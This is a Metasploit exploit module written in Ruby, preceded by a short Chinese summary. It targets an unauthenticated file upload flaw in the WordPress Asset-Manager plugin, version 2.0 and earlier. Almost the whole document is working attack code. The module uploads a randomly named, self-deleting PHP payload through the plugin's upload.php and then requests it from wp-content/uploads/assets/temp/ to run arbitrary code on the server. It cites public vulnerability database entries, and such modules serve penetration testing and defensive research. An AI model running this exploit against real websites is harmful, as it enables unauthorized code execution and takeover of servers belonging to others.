WordPress Asset-Manager PHP文件上传漏洞

这是一个 Metasploit 框架模块,针对 WordPress Asset-Manager 插件 2.0 及以下版本中的文件上传漏洞。插件的 upload.php 不做身份验证,任何用户都可以把任意文件(包括 PHP 文件)上传到临时目录 wp-content/uploads/assets/temp/,随后直接请求该文件即可执行任意代码。
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
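require 'msf/core'
# Provides the PhpEXE mixin (get_write_exec_payload) used by the exploit below.
require 'msf/core/exploit/php_exe'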

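# Unauthenticated arbitrary file upload in the WordPress Asset-Manager plugin
# (<= 2.0).  The plugin's upload.php stores whatever is posted in the
# "Filedata" form field under wp-content/uploads/assets/temp/ without checking
# the session or the file type, so a .php payload can be dropped and then
# executed with a single GET request.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # Supplies get_write_exec_payload; the forum paste had mangled this mixin
  # name into ":hpEXE", which is a syntax error.
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        # Base path of the WordPress install; the plugin paths are appended to it.
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Upload a self-deleting PHP payload through the unauthenticated upload.php
  # endpoint, then request it from the plugin's temp directory to run it.
  def exploit
    # target_uri.path belongs to the option parser; normalise a copy so the
    # trailing slash does not leak back into the TARGETURI datastore value.
    uri = target_uri.path.dup
    uri << '/' unless uri.end_with?('/')
    peer = "#{rhost}:#{rport}"

    # Random basename so repeated runs do not collide on disk; :unlink_self
    # makes the dropped file remove itself once it has executed.
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload  = get_write_exec_payload(:unlink_self => true)

    # upload.php reads the uploaded file from the "Filedata" form field.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil,
      "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    # Strip the CRLF that Rex::MIME::Message#to_s places in front of each
    # boundary marker (kept from the original module; presumably needed for
    # the plugin's multipart parser).
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # The original module treats the stored filename appearing in the
    # response body as the success signal; a literal substring match is
    # stricter than the interpolated regex it used.
    unless res && res.code == 200 && res.body.include?(payload_name)
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'    => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method' => 'GET'
    })

    # No response is not an error here: a payload that takes over the request
    # (e.g. a reverse shell) never sends an HTTP reply.  Only an explicit
    # non-200 status means the dropped file was not served/executed.
    if res && res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end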